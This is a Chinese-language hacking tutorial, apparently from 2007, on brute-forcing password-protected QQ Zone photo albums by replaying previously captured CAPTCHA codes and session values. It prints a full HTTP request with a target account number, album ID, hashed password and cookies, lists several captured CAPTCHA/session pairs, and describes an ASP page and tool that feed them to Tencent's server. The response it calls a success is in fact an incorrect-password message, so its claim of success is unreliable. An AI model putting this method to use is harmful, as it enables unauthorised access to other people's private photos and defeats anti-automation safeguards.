破解qq空间相册密码绕过验证码的方法 只是提供一种思路现在相册加了验证码所以以前我写的qq相册密码破解工具已经没用了今天我想到这个方法就是绕过验证码进行破解的 看演示 GET /cgi-bin/common/cgi_view_album?uin=215927967&refer=qzone&albumid=118370506&password=8277e0910d750195b448797616e091ad&verifycode=6em3 HTTP/1.1 Accept: */* Accept-Language: zh-cn Referer: http://photo.qq.com/proxy.html If-Modified-Since: 0 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; windows NT 5.1; SV1; .net CLR 2.0.50727) Host: photo.qq.com Connection: Keep-Alive Cookie: pvid=52343013; flv=9.0; uin_cookie=104705883; euin_cookie=AQAYPyD/qOQasqBS3xpgl2mx65lA5T0103B3GAAAAAGLrApKgStQ07DCCN40kdjHcKYiGw==; zzpanelkey=; zzpaneluin=; qqmusic_fromtag=6; beVip=0; jump=4; verifysession=09d70072c0b67e96b4e0619ac5fd13cc3e47c2079ee633fa135432b4849e6000 这个是向服务器提交的数据 215927967这个是qq号码 118370506这个是相册ID值 在相册也可看到的 8277e0910d750195b448797616e091ad 这个是MD5加密的密码 verifycode=6em3 这个就是验证码了 看服务器给我们的验证码返回了什么值 verifysession=09d70072c0b67e96b4e0619ac5fd13cc3e47c2079ee633fa135432b4849e6000 研究不出是什么方式加密的 肯定也用了MD5吧 我用的是另一种方式 我记录下几组验证玛和值就不可以进行破解了吗 用工具向服务器提交我们自定义的数据和Cookie的值当然是验证码的值了 hsmr 值:fadce5ed661a163353a675077362dca2860767ed9af299b83ad80a628523b04b ung5 值:a68cb3278e5a239ddcbf7bcfbd52b51e62308a01310960e01be3f5307281132c 9upg cc1105f8b1741c696fbf2df5b73b024561b5aa1b03da4264409a2924075b6b9e yfhx d3a35df6f3d612d27130d90d2d098597403e0fe7a16b8a6195c6c901e472696f yrkv 9b570ef0e772743724bd853fde8e56226af5f9456dad48a75f7d03f5a29fb6dc 可以了 我用asp写了个随机返回验证码和值的网页 然后用工具获取这些值再向腾讯的服务器提交我们自定义好的数据 我把上面收集好的验证码和值添加到数据库里了 然后用网页进行随机输出 看我写的工具 代码就不做详细的解释了 呵呵 看返回了什么 HTTP/1.1 200 OK Date: Mon, 05 Nov 2007 07:49:19 GMT Server: Apache Cache-Control: max-age=0 Expires: Mon, 05 Nov 2007 07:49:19 GMT Connection: close Transfer-Encoding: chunked Content-Type: text/xml 28 <?xml version=“1.0“ encoding=“gb2312“?> 9 <return> 11 <value>0</value> 48 <msg><![CDATA[您所要查看的相册需要给出正确的密码才能访问!(805)]]></msg> a </return> 成功破解了 只要我们收集的验证码够多就可以进行暴力破解了 -----------------------------------------------------------------------------------------------------